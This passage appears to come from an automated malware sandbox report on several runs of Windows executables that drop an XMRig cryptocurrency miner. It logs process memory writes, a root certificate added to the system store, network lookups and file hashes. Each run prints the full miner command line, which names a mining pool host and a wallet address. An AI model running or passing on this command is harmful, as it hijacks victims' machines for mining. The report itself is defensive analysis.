| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1076 wrote to memory of 4624 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1076 wrote to memory of 4624 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1076 wrote to memory of 4624 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1076 wrote to memory of 4624 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.246.116.51.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral13
Detonation Overview
Submitted
2024-05-27 17:20
Reported
2024-05-27 18:08
Platform
win10v2004-20240508-en
Max time kernel
1797s
Max time network
1804s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (certificate blob data omitted) | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (certificate blob data omitted) | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3396 wrote to memory of 1036 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3396 wrote to memory of 1036 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral20
Detonation Overview
Submitted
2024-05-27 17:20
Reported
2024-05-27 18:11
Platform
win10v2004-20240508-en
Max time kernel
1792s
Max time network
1796s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4956 wrote to memory of 1176 | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main.exe
"C:\Users\Admin\AppData\Local\Temp\main.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |